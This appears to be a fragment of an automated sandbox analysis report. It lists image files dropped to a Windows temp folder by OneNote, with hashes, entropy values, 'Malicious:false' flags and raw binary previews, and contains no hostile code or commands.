                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{53CCF0CB-23FB-42CB-9EBA-D13566DB9EB4}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{53E101B9-C80A-41DF-AFD9-F99D3B4FBE68}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):52945
                                                                                                                                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{53EAFA43-DDE4-4225-862D-44D74719F86A}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5413E824-DC21-4E23-9059-0B574AE1D4A3}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41893
                                                                                                                                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{541459BF-D78C-49A4-ADDF-4381598C6687}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5436B009-899F-4F1A-AEEB-6A6F0BA72F9D}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{549788BB-7E86-45A3-8786-CC9561AB8873}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2033
                                                                                                                                                                                                                  Entropy (8bit):6.8741208714657
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                                                                                                                                  MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                                                                                                                                  SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                                                                                                                                  SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                                                                                                                                  SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{56EF16D0-4B94-430B-AED3-A6A7162C1874}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{576732E2-C3B3-4726-8B49-A250577E3FE0}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5A91E6EF-F65A-4A61-9C9E-FF3C1209B7B5}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5B0C0C3D-1208-4C11-AF6C-1EE5BEBE7A57}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5BA96239-D15E-4EF7-B56D-399E91841E73}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2104
                                                                                                                                                                                                                  Entropy (8bit):7.252780160030615
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                                                                                                                                  MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                                                                                                                                  SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                                                                                                                                  SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                                                                                                                                  SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{5BB1E5B9-C907-410F-950F-E1F8A7FAF884}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):27862
                                                                                                                                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
